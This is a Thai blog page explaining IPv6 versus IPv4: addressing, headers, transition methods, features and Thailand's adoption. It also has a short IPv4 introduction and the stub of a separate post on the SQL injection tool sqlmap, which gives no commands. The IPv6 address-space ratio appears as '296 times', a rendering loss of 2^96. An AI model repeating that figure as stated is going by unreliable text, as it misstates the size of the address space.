นักวิจัยเริ่มพบว่าจำนวนไอพีแอดเดรส (IP address) ของ IPv4 กำลังจะถูกใช้หมดไป ไม่เพียงพอกับการใช้งานอินเทอร์เน็ตในอนาคตจนคาดคะเนกันว่าหมายเลขไอพีแอดเดรสของ IPv4 จะมีไม่พอกับความต้องการในปี ค.ศ. 2010 และหากเกิดขึ้นก็หมายความว่าเราจะไม่สามารถเชื่อมต่อเครือข่ายเข้ากับ ระบบอินเทอร์เน็ตที่เพิ่มขึ้นได้อีก ดังนั้นคณะทำงาน IETF (The Internet Engineering Task Force) ซึ่งตระหนักถึงปัญหาสำคัญดังกล่าว จึงได้พัฒนาอินเทอร์เน็ตโพรโตคอลรุ่นใหม่ขึ้น คือ รุ่นที่หก (Internet Protocol version 6; IPv6) เพื่อทดแทนอินเทอร์เน็ตโพรโตคอลรุ่นเดิม โดยมีวัตถุประสงค์ IPv6 เพื่อปรับปรุงโครงสร้างของตัวโพรโตคอล ให้รองรับไอพีแอดเดรส (IP address) จำนวนมาก และปรับปรุงคุณลักษณะอื่นๆ อีกหลายประการ ทั้งในแง่ของประสิทธิภาพและความปลอดภัยรองรับระบบแอพพลิเคชั่น (application) ใหม่ๆ ที่จะเกิดขึ้นในอนาคต และเพิ่มประสิทธิภาพในการประมวลผลแพ็กเก็ต (packet) ให้ดีขึ้น ทำให้สามารถตอบสนองต่อการขยายตัวและความต้องการใช้งานเทคโนโลยีบนเครือข่ายอินเทอร์เน็ตในอนาคตได้เป็นอย่างดี

Internet Protocol version 6 (IPv6) บางครั้งเรียกว่า Next Generation Internet Protocol หรือ IPng ถูกออกแบบมาให้ทำงานได้ดีในเครือข่ายที่มีประสิทธิภาพสูง (เช่น Gigabit Ethernet, OC-12,ATM) และในขณะเดียวกันก็ยังสามารถทำงานในเครือข่ายที่มีประสิทธิภาพต่ำได้ (เช่น Wireless Network) นอกจากนี้ยังได้มีการจัดเตรียมแพลตฟอร์มสำหรับฟังก์ชันใหม่ๆ ของอินเตอร์เน็ตซึ่งเป็นที่ต้องการใช้ในอนาคต ความแตกต่างระหว่าง IPv6 และ IPv4 มีอยู่ 5 ส่วนใหญ่ๆ คือ ไอพีแอดเดรส (IP address) และการเลือกเส้นทาง (Addressing & Routing) ความปลอดภัย อุปกรณ์แปลแอดเดรส (Network Address Translator : NAT) การลดภาระในการจัดการของผู้ดูแลระบบ และการรองรับการใช้งานในอุปกรณ์พกพา (Mobile Devices)

ประโยชน์หลักของ IPv6 และเป็นเหตุผลสำคัญของการเริ่มใช้ IPv6 ได้แก่ จำนวน ไอพีแอดเดรส ที่เพิ่มขึ้นอย่างมากมายมหาศาลเมื่อเปรียบเทียบกับจำนวน ไอพีแอดเดรส เดิมภายใต้ IPv4 address มี 32 บิต ในขณะที่ IPv6 address มี 128 บิต ความแตกต่างของจำนวน ไอพีแอดเดรส มีมากถึง 296 เท่า

รูปที่ 1 รูปแบบของแอดเดรส IPv4 และ IPv6

หมายเลขแอดเดรสของ IPv6 มีลักษณะประกอบไปด้วย กลุ่มตัวเลข 8 กลุ่ม เขียนขั้นกั้นด้วยเครื่องหมาย “ : ” โดยแต่ละกลุ่มคือเลขฐาน 16 จำนวน 4 ตัว (16 bit)

รูปที่ 2 ตัวอย่างหมายเลขแอดเดรส IPv4 และ IPv6

ด้วยความยาวที่เพิ่มขึ้นของ IPv6 address ทำให้ไม่สะดวกที่จะใช้ตัวเลขฐานสิบ สามารถเขียนแบบย่อได้ โดยมีเงื่อนไขดังนี้

1.หากมีเลขศูนย์ด้านหน้าของกลุ่มใดสามารถจะละไว้ได้

2.หากกลุ่มใดเป็นเลขศูนย์ทั้ง 4 ตัว (0000) สามารถเขียนแทนด้วย “ 0 ”

3.หากกลุ่มใดกลุ่มหนึ่ง (หรือหลายๆกลุ่มที่ตำแหน่งติดกัน) เป็นเลขศูนย์ทั้งหมด สามารถจะละไว้ได้โดยใช้เครื่องหมาย “ :: ” แต่จะสามารถทำลักษณะนี้ได้ตำแหน่งเดียวเท่านั้นเพื่อไม่ให้เกิดความสับสน

รูปที่ 3 ตัวอย่างการเขียนหมายเลขแอดเดรส IPv6 แบบย่อ
เปรียบเทียบ Header ระหว่าง IPv4 และ IPv6

เฮดเดอร์ (Header) ของข้อมูลแบบ IPv6 แพ็กเก็ต (packet) ถูกออกแบบมาให้มีขนาดคงที่ที่ 40 ไบต์ (bytes) และมีรูปแบบที่ง่ายที่สุดเท่าที่จะทำได้ โดยเฮดเดอร์ จะประกอบด้วยตำแหน่งต่างๆที่จำเป็นต้องใช้ในการประมวลผลแพ็กเก็ต (packet) ที่เราเตอร์ (router) หรืออุปกรณ์เลือกเส้นทางทุกตัวเท่านั้น ส่วนตำแหน่งที่อาจจะถูกประมวลผลเฉพาะที่ต้นหรือปลายทางหรือที่เราท์เตอร์บางตัว จะถูกแยกออกมาไว้ที่ส่วนขยายของเฮดเดอร์ (extended header)

รูปที่ 4 การเปรียบเทียบ Header ระหว่าง IPv4 และ IPv6

จะเห็นว่าเฮดเดอร์ IPv6 ถึงแม้จะมีขนาดยาวกว่า IPv4 แต่จะดูเรียบง่ายกว่าเฮดเดอร์ของ IPv4 มาก ทั้งนี้หากพิจารณาเฮดเดอร์ของ IPv6 เทียบกับของ IPv4 จะสามารถเปรียบเทียบความแตกต่างได้ดังนี้

ตารางที่ 1 เปรียบเทียบโครงสร้างทางเทคนิคของ IPv6 และ IPv4

ตำแหน่งข้อมูลที่ตัดออก

Header length ถูกตัดออกไป เพราะเฮดเดอร์ของ IPv6 มีขนาดคงที่ที่ 40 ไบต์ (bytes) ทำให้ประสิทธิ ภาพโดยรวมของการประมวลผลแพ็กเก็ตดีขึ้น ไม่เสียเวลาในการคำนวณขนาดของเฮดเดอร์

• Identification, Flag, Flag Offset, Protocol,Options, และ Padding ถูกย้ายไปอยู่ใน ส่วนขยายของเฮดเดอร์ (extended header)เพราะถือว่าเป็นส่วนที่ไม่จำเป็นต้องประมวลผลในทุกๆ เราเตอร์

• Header Checksum ถูกตัดออกเพราะว่าซ้ำซ้อนกับฟังก์ชันของโพรโตคอลในชั้นที่อยู่สูงกว่า อีกทั้งเป็นการเพิ่มประสิทธิภาพของการประมวลผลด้วย เพราะ Checksum จะต้องมีการคำนวณใหม่ที่เราเตอร์เสมอหากตัดออกก็จะลดภาระงานที่เราเตอร์ไปได้

ตำแหน่งข้อมูลที่ปรับเปลี่ยน

• Total Length เปลี่ยนมาเป็น Payload lengthเพื่อระบุขนาดของ Payload ในหน่วยไบต์ดังนั้นขนาดของ Payload สูงสุดจะเป็น 65,535 ไบต์ (bytes)

• Time-To-Live (TTL) ของ IPv4 เปลี่ยนมาเป็น Hop Limit เพราะ TTL ระบุเวลาที่แพ็กเก็ตจะวนเวียนอยู่ในอินเทอร์เน็ต (หน่วยเป็นวินาที)โดยระบุว่าแต่ละเราเตอร์ต้องลด TTL ลงอย่างน้อย 1 วินาที เราเตอร์จึงลด TTL ครั้งละ 1 หน่วยเสมอแม้ว่าจะใช้เวลาประมวลผลแพ็กเก็ตน้อยกว่านั้น ทำให้ไม่ตรงกับความหมายของ TTL ดังนั้นจึงถูกเปลี่ยนเป็น Hop Limit เพื่อให้ตรงกับความหมายจริงๆ ซึ่งเหมาะสมและง่ายต่อการประมวลผล

• Protocol เปลี่ยนมาเป็น Next Header ซึ่งใช้เป็นตัวบอกว่า extended header ตัวถัดไปเป็นเฮดเดอร์ ประเภทไหน เช่น ถ้าเป็น extended header ชนิด IPsec จะมีค่า Next Header = 51

ตำแหน่งข้อมูลที่เพิ่ม

• Flow Label ใช้ระบุลักษณะการไหลเวียนของทราฟฟิกระหว่างต้นทางกับปลายทาง เนื่องจากในแอปพลิเคชั่นหนึ่ง สามารถมีทราฟฟิกหลายประเภท (เช่น ภาพ เสียง ตัวอักษร ฯลฯ) และทราฟฟิกแต่ละประเภทมีความต้องการที่แตกต่างกัน Flow Label จึงมีไว้เพื่อแยกประเภทของทราฟฟิกและเพื่อให้เราเตอร์รู้ว่าควรปฏิบัติต่อทราฟฟิกแต่ละประเภทแตกต่างกัน

• Type-of-Service (TOS) เปลี่ยนมาเป็น Traffic Class ซึ่งมีจำนวนบิตมากกว่า สามารถแบ่งกลุ่มและระดับความสำคัญของแต่ละแพ็กเก็ตละเอียดมากขึ้น เพื่อที่เราเตอร์จะจัดลำดับขั้นการส่งแพ็กเก็ตให้เหมาะสม

การปรับเปลี่ยนระบบเครือข่ายจาก IPv4 สู่ IPv6

การปรับเปลี่ยนในช่วงแรก การใช้งาน IPv6 อาจอยู่ในวงแคบ ดังนั้นเราต้องการเทคนิคเพื่อเชื่อมต่อเครือข่ายที่เป็น IPv6 เข้ากับเครือข่าย IPv4หรือเครือข่าย IPv6 อื่น เทคนิคการทำงานร่วมกันระหว่าง IPv4 และ IPv6 แบ่งออกเป็น 3 ประเภทด้วยกันคือ

1. Dual Stacks เป็นการใช้งาน IPv4 และ IPv6 stack ควบคู่กันไป ภายในอุปกรณ์ตัวเดียวกัน Dual Stacks สามารถใช้ได้ทั้งที่ end host ที่เซิร์ฟเวอร์และที่อุปกรณ์เครือข่าย (network device) เช่น เราท์เตอร์ Dual Stacks เป็นทางออกที่ง่ายที่สุดสำหรับเครือข่ายที่ต้องการเริ่มใช้งาน IPv6 และถูกใช้อย่างแพร่หลายมากที่สุดในปัจจุบัน

รูปที่ 5 การทำงานร่วมกันระหว่าง IPv4 และ IPv6 แบบ Dual Stacks

2. Tunneling เป็นการสร้างท่อในการรับส่ง IPv6 ผ่านไปบนเครือข่าย IPv4 การทำอุโมงค์ โดยทั่วไปเป็นการ encapsulate แพ็กเก็ตข้อมูลที่ต้องการส่งไว้ในอีกแพ็กเก็ตหนึ่ง เนื่องจากแพ็กเก็ตที่อยู่ภายในไม่สามารถถูกส่งไปยังปลายทางได้ จึงต้องอาศัยการห่อหุ้มด้วยแพ็กเก็ตอื่น การทำอุโมงค์เพื่อใช้งาน IPv6 นั้นก็เช่นกันใช้เมื่อเครือข่ายเชื่อมต่ออยู่ด้วยไม่สนับสนุน IPv6 จึงจำเป็นต้องหุ้มแพ็กเก็ต IPv6 ไว้ภายใต้แพ็กเก็ต IPv4 อีกที

รูปที่ 6 การทำ IPv6 in IPv4 packet encapsulation

การทำ Tunnel สำหรับเครือข่าย IPv6 ต้องสร้างเส้นทางการติดต่อระหว่างเครื่องที่ใช้หมายเลข IPv6 ผ่านเครือข่ายที่ใช้หมายเลข IPv4 โดยเกตเวย์ (Gateway) ของเครือข่ายของเครื่องที่ใช้หมายเลข IPv6 จะทำหน้าที่ห่อหุ้มแพ็กเก็ต IPv6 ไว้ใน IPv4 ก่อนจะส่งไปในเครือข่ายอินเทอร์เน็ตที่สนับสนุนการใช้หมายเลข IPv4 เท่านั้น โดยระหว่างทางจะดูหมายเลขต้นทางและปลายทางที่อยู่ในส่วนหัวของแพ็กเก็ต IPv4 เท่านั้น จะไม่สนใจส่วนที่อยู่ภายในเมื่อส่งไปถึงปลายทางเกตเวย์จะถอดแพ็กเก็ต IPv4 ออกให้เหลือแต่แพ็กเก็ต IPv6 แล้วส่งไปยังเครื่องที่ใช้หมายเลข IPv6 ต่อไป

รูปที่ 7 การเชื่อมต่อเครือข่ายแบบอุโมงค์ IPv6-over-IPv4 Tunnel

3. Translation เป็นวิธีที่ใช้กับการสื่อสารข้ามเครือข่าย เช่น โหนดจากเครือข่าย IPv4 ต้องการคุยกับเซิร์ฟเวอร์ในเครือข่าย IPv6 หรือโหนดที่เป็น IPv6 ต้องการคุยกับเซิร์ฟเวอร์ที่เป็น IPv4 ซึ่งจะเป็นกรณีที่ต่างไปจากการใช้งาน Dual Stacks และ Tunnel การทำ Translation พูดง่ายๆ ก็คือ การแปลงข้อมูลไปมาระหว่างข้อมูลในรูปแบบของ IPv4 และ IPv6 การแปลงข้อมูลนี้สามารถทำได้สองแบบ

แบบแรก คือการแปลงที่ end host โดยเพิ่ม translator function เข้าไปใน protocol stack โดยอาจอยู่ที่ network layer หรือ socket layer ก็ได้

แบบสอง คือการแปลงที่ network device โดยจะต้องใช้ gateway ทำหน้าที่เป็น IPv6 – IPv4 และ IPv4 – IPv6 translator อยู่ที่ทางออกที่มีการเชื่อมต่อระหว่างเครือข่าย IPv6 และ IPv4

รูปที่ 8 โครงสร้างของ Network Stacks เพื่อการแปลงข้อมูลระหว่าง IPv6 และ IPv4

รูปที่ 9 แผนภาพแสดงการปรับเปลี่ยนระบบจาก IPv4 ไปสู่ IPv6

ความสามารถพิเศษของ IPv6 ที่เหนือกว่า IPv4

1. Management

การตั้งค่าและปรับแต่งระบบเครือข่าย ในปัจจุบันมีความซับซ้อนมาก IPv6 จึงถูกออกแบบมาให้สนับสนุนการติดตั้งและปรับแต่งระบบแบบอัตโนมัติ(auto configuration) เพื่ออำนวยความสะดวกให้กับการจัดสรรปรับเปลี่ยน IP address (Address Renumbering) การเชื่อมต่อกับผู้ให้บริการหลายราย (Multi homing) และแม้แต่การจัดการเครือข่ายแบบ Plug-and-play

2. Broadcast/Multicast/Anycast

ใน IPv4 ได้มีการจัดสรร IP Address ส่วนหนึ่งเพื่อเป็น Broadcast address แต่ในความเป็นจริงแล้วการสื่อสารแบบ Broadcast เป็นสิ่งที่ไม่มีความจำเป็นและสิ้นเปลือง Bandwidth โดยเปล่าประโยชน์ Multicast เป็นการสื่อสารที่มีประสิทธิภาพมากกว่าและเริ่มเป็นที่นิยม IPv6 จึงถูกออกแบบมาให้รองรับ Multicast group address และตัด Broadcast address ออก

นอกจากนี้ IPv6 ยังเพิ่มความสามารถในการสื่อสารแบบ Anycast โดยอนุญาตให้อุปกรณ์มากกว่า 1ชิ้นได้รับการจัดสรร IP address เบอร์เดียวกันซึ่งหมายความว่าอุปกรณ์ชิ้นใดก็ได้สามารถตอบสนองต่อข้อมูลที่ส่งมาที่ Anycast address นั้นๆ

3. Mobile IP

IPv6 สนับสนุนการใช้งานอินเทอร์เน็ตแบบเคลื่อนที่เช่นเดียวกับ IPv4 แต่ว่าการใช้งาน Mobile IPv6 นั้นมีประสิทธิภาพมากกว่า Mobile IPv4 ตรงที่สามารถส่งข้อมูลผ่านเส้นทางที่สั้นที่สุดโดยไม่ต้องพึ่งอุปกรณ์ตัวกลางในการส่งต่อข้อมูล(Route Optimization)และสามารถใช้ IPSec ในการป้องกันการโจรกรรมแพ็กเก็ตกลางทาง

4. Security

เราเตอร์และอุปกรณ์เครือข่ายทุกตัวในเครือข่าย IPv6 ถูกกำหนดให้รองรับการใช้งาน IPSec นอกจากนี้ยังมีการกำหนด Security Payload สองประเภทคือ Authentication Payload และ Encrypted Security Payload เพื่อสนับสนุนการรับส่งข้อมูลที่มั่นคงปลอดภัย ภายใต้ Network Layer แทนที่จะพึ่ง Application Layer เหมือนในเครือข่าย IPv4

รูปที่ 10 แสดงระบบ Security ที่ใช้ IPv6

5. Virtual Private Network (VPN )

แต่เดิมในเครือข่าย IPv4 การให้บริการ VPN ทำได้โดยใช้ IPSec เพื่อเข้ารหัสข้อมูลใน Network Layer ทั้งหมด ซึ่งจะติดปัญหาหากเครือข่ายต้นทางหรือปลายทางมีการทำ Network Address Translation (NAT) เพราะการเข้ารหัสจะต้องสิ้นสุดก่อนถึงจุดหมายปลายทางสำหรับเครือข่าย IPv6 ไม่มีปัญหาดังกล่าว เพราะไม่มีความจำเป็นต้องใช้ NAT อีกต่อไป นอกจากนี้ยังสามารถใช้ Extended Header ที่เรียกว่า Authentication Header และ Encapsulated Security Payload เพื่อรองรับการใช้งาน VPN แบบปลอดภัย

6. Quality-of-Service

IPv6 ถูกออกแบบมาให้สนับสนุนการรับประกันคุณภาพของบริการตั้งแต่เริ่ม โดยจะเห็นได้จากตำแหน่ง Flow Label และ Traffic Class ในเฮดเดอร์ ถึงแม้ว่าในเฮดเดอร์ของ IPv4 จะมีตำแหน่ง Type-of-Service แต่ไม่มีการใช้อย่างแพร่หลาย เนื่องจากไม่มีมาตรฐานในการกำหนดค่าและเราเตอร์บางตัวเท่านั้นที่สามารถประมวลผลตำแหน่ง ToS ได้ ที่ผ่านมา IPv4 มักปล่อยให้ Layer ข้างล่างจัดการเรื่อง QoS แทน เช่น ผ่านเทคโนโลยี MPLS

7. Maximum Transfer Unit (MTU)

MTU ขั้นต่ำในเครือข่าย IPv4 คือ 576 ไบต์ และถูกเพิ่มเป็น 1280ไบต์ ในเครือข่าย IPv6 การเพิ่มความยาวขั้นต่ำของMTU นี้จะช่วยให้การส่งข้อมูลในเครือข่าย IPv6 มีประสิทธิภาพมากขึ้น โดยช่วยลดสัดส่วนของข้อมูลเฮดเดอร์ต่อข้อมูลทั้งหมด

คุณสมบัติของ IP v.6 ที่เหนือกว่า IP v.4

IP V.6 มีคุณสมบัติที่เหนือกว่า IP V.4 มากมาย ซึ่งสามารถสรุปคร่าวๆ ได้ 5 หัวข้อ ได้แก่ เรื่องการกำหนดแอดเดรส (Addressing), การปรับแต่งระบบ (Configuration), การรับส่งขอมูล (Data Delivery), การค้นหาเส้นทาง (Routing) และความปลอดภัย (Security) ซึ่งรายละเอียดแสดงในตารางที่ 2

ตารางที่ 2 ข้อดีของ IPv6 ที่เหนือกว่า IPv4

อุปกรณ์ที่สนับสนุน IPv6

เนื่องจากจำนวน IP address ของ IPv6 นั้นมีมากมาย อุปกรณ์ต่าง ๆ จึงสามารถที่จะมีหมายเลข IP address ของตัวเองทำให้สามารถเชื่อมต่ออินเทอร์เน็ตได้ อีกทั้งประสิทธิภาพและข้อดีต่าง ๆ ของ IPv6 จะทำให้เกิดโปรแกรม อุปกรณ์ และการใช้งานใหม่ๆ ขึ้นมาอีกมากมายในอนาคต อาทิเช่น Mobile IPv6, 3G Mobile Broadband, Mobile IP Broadcast, VoIP, P2P Game เป็นต้น แม้กระทั่งอุปกรณ์เครื่องใช้ไฟฟ้าภายในบ้านก็จะมี IP address ประจำทำให้แยกแยะและควบคุมได้ เกิดเป็นเครือข่ายภายในบ้าน (Home Network) เช่น ควบคุมการเปิด-ปิดอุปกรณ์เครื่องใช้ไฟฟ้าภายในบ้านผ่านเครือข่ายอินเทอร์เน็ต โทรทัศน์ในอนาคตจะเป็นแบบ interactive คือ สามารถโต้ตอบกับผู้ชมได้ สัญญาณกันขโมยสามารถที่จะส่ง real-time IPv6 packet ไปแจ้งตำรวจหรือสายตรวจที่อยู่ใกล้บ้านเราที่สุดได้ อีกตัวอย่าง คือ Internet Car โดยการใช้ IPv6 ร่วมกับ GPS เพื่อบอกตำแหน่ง เนื่องจากประสิทธิภาพการใช้ GPS ในเมืองจะต่ำเพราะตึกสูงๆ จะบังสัญญาณ ดังนั้นการใช้ร่วมกับ wireless/mobile Internet จะดีกว่า ตัวอย่างสุดท้าย เป็นการใช้งานโดยการติดตั้งกล้อง Surveillance IPv6 camera เพื่อดูแลความปลอดภัยหรือดูสภาพการจราจร กล้องเหล่านี้สามารถเป็น Server ได้ในตัว เก็บข้อมูลได้และติดต่อกันได้โดยตรงเนื่องจากมี IP address จริงเป็นของตัวเอง เป็นต้น

สถานการณ์ในปัจจุบัน

ถึงแม้จะเป็นที่ยอมรับกันโดยทั่วไปว่าสักวันหนึ่งอินเทอร์เน็ตจะต้องปรับเปลี่ยนไปใช้ IPv6 แต่ความตื่นตัวในการปรับเปลี่ยนได้เกิดขึ้นช้ากว่าที่คาดหมายกันไว้ สาเหตุสำคัญ อาจเนื่องมาจากทัศนคติที่ว่า ตราบใดที่อินเตอร์เน็ตยังไม่ขาดแคลนไอพีแอดเดรส IPv6 ก็ยังคงเป็นสิ่งฟุ่มเฟือยและยังไม่จำเป็นมากนัก ถึงกระนั้นก็ตาม IPv6 เริ่มได้รับการยอมรับมากขึ้น เพราะผู้ให้บริการอินเทอร์เน็ตต่างตระหนักดีว่า ไม่ช้าก็เร็ว ปัญหาการขาดแคลนไอพีแอดเดรสจะต้องมาถึง และเมื่อถึงเวลานั้นผู้ที่มีความพร้อมมากกว่าจะเป็นผู้ได้เปรียบ นอกจากนั้น IPv6 ยังเป็นทางออกที่ถาวรทางเดียวในการแก้ปัญหานี้

การผลักดันให้เกิดการนำ IPv6 ไปใช้งานจริง มีจุดศูนย์กลางอยู่ที่ทวีปยุโรปและเอเชียเป็นหลัก ส่วนทวีปอเมริกาเหนือนั้นยังไม่มีจุดยืนที่ชัดเจน สาเหตุที่สำคัญประการแรกคือ ในปัจจุบันทวีปอเมริกาเหนือมีส่วนแบ่งของไอพีแอดเดรสอยู่ถึงร้อยละ 70 ของไอพีแอดเดรสทั้งหมดในโลก จึงไม่เป็นที่น่าแปลกใจที่ทวีปนี้ยังไม่เห็นความจำเป็นของ IPv6 ในทางตรงกันข้าม ทั้งยุโรปและเอเชียต่างพบปัญหาการมีไอพีแอดเดรสไม่พอกับจำนวนผู้ใช้อินเทอร์เน็ต สาเหตุประการที่สอง สืบเนื่องมาจากเทคโนโลยีโทรศัพท์เคลื่อนที่ยุคที่สาม (3G wireless technology) ทั้งยุโรปและเอเชีย ต่างมีความต้องการสูงทางเทคโนโลยี 3G ซึ่งเทคโนโลยีนี้ทำให้เกิดความต้องการไอพีแอดเดรสที่เพิ่มขึ้น ดังนั้นเราจึงพบว่าผู้ผลิตฮาร์ดแวร์ ซอฟต์แวร์ และองค์กรที่ทำหน้าที่กำหนดมาตรฐานต่างๆ ในทวีปยุโรปและเอเชียต่างส่งสัญญาณที่จะแก้ปัญหาการขาดแคลนไอพีแอดเดรส หรืออีกนัยหนึ่งการตอบรับต่อ IPv6 อย่างจริงจัง

ในส่วนของประเทศไทย ศูนย์เทคโนโลยีอิเล็กทรอนิคส์และคอมพิวเตอร์แห่งชาติ นับว่าเป็นผู้นำในการให้บริการเชื่อมต่อเครือข่าย IPv6 กับต่างประเทศผ่านการทำ IPv6-over-IPv4 tunnel และการทำ 6to4 relay นอกจากนี้ ศูนย์เทคโนโลยีอิเล็กทรอนิคส์และคอมพิวเตอร์แห่งชาติ ยังได้รับความร่วมมือจากหลายมหาวิทยาลัยและบริษัทผู้ให้บริการอินเทอร์เน็ต ทำให้เกิดเครือข่าย IPv6 เพื่อการทดสอบภายในประเทศ (Thailand IPv6 Testbed) ซึ่งมีการเชื่อมต่อด้วยเทคนิคที่หลากหลาย เช่น dual stacks, IPv6-over-IPv4 tunnel และ Native IPv6 เป็นต้น (รายละเอียดสามารถดูได้จาก http://www.ip6.nectec.or.th) ในปัจจุบันได้มีการก่อตั้งคณะทำงานระดับประเทศขึ้นภายใต้ชื่อ Thailand IPv6 Forum หรือโครงการความร่วมมือพัฒนาและส่งเสริมการใช้เครือข่าย IPv6 ซึ่งเป็นความร่วมมือระหว่างหน่วยงานวิจัย ผู้ให้บริการอินเทอร์เน็ต และผู้ผลิตหรือตัวแทนจำหน่ายฮาร์ดแวร์ระบบเครือข่าย ซึ่งนับว่าเป็นนิมิตรหมายอันดีถึงความตื่นตัวของประเทศไทยในการรับมือกับ IPv6

รูปที่ 11 แผนผังแสดงเครือข่ายทดสอบ Thailand IPv6 Testbed

บทสรุป

การเติบโตอย่างรวดเร็วของเทคโนโลยีเครือข่ายอินเทอร์เน็ต ทำให้ IPv4 ที่ใช้กันอยู่แพร่หลายในปัจจุบันมีแนวโน้มว่ากำลังจะถูกใช้หมดไปในเวลาอันใกล้นี้ ดังนั้น IPv6 จึงเป็นทางออกทางเดียว โดยได้มีการพัฒนาปรับปรุงตัว Protocol เพื่อแก้ปัญหาเหล่านี้ อีกทั้งยังเพิ่มประสิทธิภาพคุณสมบัติต่างๆ ที่เหนือกว่า IPv4 อีกด้วย

ด้วยความไม่พอเพียงของ IPv4 ที่กำลังจะหมดไป และคุณสมบัติที่เหนือกว่าอย่างมากของ IPv6 ไม่ช้าก็เร็วทุกภาคทุกหน่วยงานจำเป็นต้องนำ IPv6 มาใช้อย่างเลี่ยงไม่ได้ และต้องมีการปรับเปลี่ยนระบบโครงข่ายให้รองรับกับการใช้งาน IPv6 เพื่อตอบสนองต่อความต้องการที่เพิ่มขึ้นอย่างมากของผู้บริโภคในการใช้งานอินเทอร์เน็ตและการใช้งานแอพพลิเคชั่นต่างๆ ดังนั้นผู้ให้บริการเหล่านี้ควรมีการศึกษาวางแผนเตรียมพร้อมล่วงหน้า เพื่อรับมือกับการเปลี่ยนแปลงในการนำ IPv6 มาใช้ในอนาคต โดยผู้ให้บริการควรสำรวจอุปกรณ์เครือข่ายที่สามารถรองรับกับ IPv6 และวางแผนเตรียมพร้อมในการปรับปรุงโครงข่ายของตน ในส่วนของผู้พัฒนา product และแอพพลิเคชั่นก็สามารถที่จะสร้างโอกาสทางธุรกิจได้ โดยศึกษาความต้องการของตลาด เพื่อคิดค้นออกแบบพัฒนา product หรือแอพพลิเคชั่นที่รองรับกับ IPv6 ซึ่งเหล่านี้ควรมีการเตรียมพร้อมไว้ล่วงหน้า เพราะเมื่อถึงเวลาที่ IPv4 หมดลงจริงๆ ผู้ที่พร้อมมากกว่าจะเป็นผู้ได้เปรียบ นอกจากนี้ความเร็วในการเข้ามาและการเตรียมความพร้อมที่ดีจะเป็นการเพิ่มโอกาสทางการแข่งขันทางธุรกิจอีกด้วย

Internet Protocol (IPV4)

1.บทนำ

โปรโตคอล เป็นชุดของกฎกติกาในรูปแบบของซอฟต์แวร์ที่ใช้ควบคุมดูแลการทำงาน เพื่อการแลกเปลี่ยนข้อมูลข่าวสารและสถานะระหว่างเครื่องคอมพิวเตอร์หรือชุดอุปกรณ์เครือข่ายผ่านทางสายสัญญาณที่เชื่อมต่อกันโดยตรงหรือผ่านทางเครือข่ายโปรโตคอล โปรโตคอลระบบเครือข่ายมีไว้เพื่อควบคุมดูแลการทำงานตั้งแต่ระดับ Application ลงมาจนถึงอุปกรณ์เชื่อมต่อเครือข่าย โปรโตคอลที่รู้จักกันแพร่หลาย เช่น อินเตอร์เน็ต โปรโตคอล หรือ IP ซึ่งใช้เป็นรูปแบบมาตรฐานในการส่ง   ข้อมูลต่างๆในอินเตอร์เน็ต โดยมีหมายเลขไอพี หรือไอพีแอดเดรสเฉพาะตัว โดยไอพีแอดเดรสมีไว้เพื่อให้ผู้ส่งรู้ว่าเครื่องของผู้รับคือใคร และผู้รับสามารถรู้ได้ว่าผู้ส่งคือใคร เนื่องจากในปัจจุบันมีการใช้ไอพีแอดเดรสในงานต่างๆ   และความต้องการไอพีแอดเดรสยังคงเพิ่มมากขึ้นอย่างต่อเนื่องในอนาคต   เพื่อที่จะรองรับเทคโนโลยีสมัยใหม่ที่ทันสมัยซึ่งจำเป็นต้องใช้ไอพีแอดเดรสในการติดต่อสื่อสารกัน ความต้องการใช้งานไอพีแอดเดรสนั้น ไม่ได้จำกัดอยู่เพียงแค่เครื่องคอมพิวเตอร์ที่อยู่ตามบ้านหรือหน่วยงานต่างๆเท่านั้น   แต่ปัจจุบันยังมีอุปกรณ์อื่นที่ต้องการใช้ไอพีแอดเดรส เช่น   คอมพิวเตอร์แบบพกพา อุปกรณ์สื่อสารในยุค 3G

2. IP (Internet Protocol)

                IP เป็นโปรโตคอลในระดับเน็ตเวิร์คเลเยอร์ ทำหน้าที่จัดการเกี่ยวกับแอดเดรสและข้อมูล และควบคุมการส่งข้อมูลบางอย่างที่ใช้ในการหาเส้นทางของแพ็กเก็ต ซึ่งกลไกในการหาเส้นทางของ IP จะมีความสามารถในการหาเส้นทางที่ดีที่สุด และสามารถเปลี่ยนแปลงเส้นทางได้ในระหว่างการส่งข้อมูล และมีระบบการแยกและประกอบดาต้าแกรม (datagram) เพื่อรองรับการส่งข้อมูลระดับ data link ที่มีขนาด MTU (Maximum Transmission Unit) ทีแตกต่างกัน ทำให้สามารถนำ IP ไปใช้บนโปรโตคอลอื่นได้หลากหลาย เช่น Ethernet ,Token Ring หรือ Apple Talk

                การเชื่อมต่อของ IP เพื่อทำการส่งข้อมูล จะเป็นแบบ connectionless หรือเกิดเส้นทางการเชื่อมต่อในทุกๆครั้งของการส่งข้อมูล 1 ดาต้าแกรม โดยจะไม่ทราบถึงข้อมูลดาต้าแกรมที่ส่งก่อนหน้าหรือส่งตามมา แต่การส่งข้อมูลใน 1 ดาต้าแกรม อาจจะเกิดการส่งได้หลายครั้งในกรณีที่มีการแบ่งข้อมูลออกเป็นส่วนย่อยๆ (fragmentation) และถูกนำไปรวมเป็นดาต้าแกรมเดิมเมื่อถึงปลายทาง

2.1 รูปแบบการแบ่งกลุ่ม Address

ไอพีแอดเดรสของ IPv4 เป็นระบบ 32 บิต หรือสามารถระบุเลขไอพีได้ตั้ง 0.0.0.0 ถึง 255.255.255.255 (ตัวเลขบางตัวเป็นไอพีสงวนไว้สำหรับหน้าที่เฉพาะเช่น 127.0.0.0 จะเป็นการระบุถึงตัวอุปกรณ์เองไม่ว่าอุปกรณ์นั้นจะมีไอพีสื่อสารจริงๆ เป็นเท่าไร) ไอพีแอดเดรสของ IPv4 นั้นจะเขียนโดยใช้เลขฐานสิบจำนวนสี่หลักโดยใช้จุดคั่นระหว่างแต่ละหลัก IPv4 ทั้งหมดถูกแบ่งออกเป็น Classชนิดต่างๆ เพื่อจุดประสงค์ในการใช้งานต่างๆกันดังต่อไปนี้

ตารางที่ 1 IP Address และจำนวนโฮสในแต่ละ Class

เครดิต : http://nattawadee00.blogspot.com/

วิธีใช้ SQL Map แบบคร่าวๆ

2013-10-24T11:29:00.001+07:00

วิธีใช้ SQLmap แบบง่ายถึงปานกลางๆ

ตัวอย่าง วิธีใช้ sqlmap แบบง่ายๆ ...?
ซึ่งผมว่า sqlmap.py -h แล้วอ่านซัก 15 นาทีก็น่าจะเข้าใจวิธีใช้แล้วล่ะ
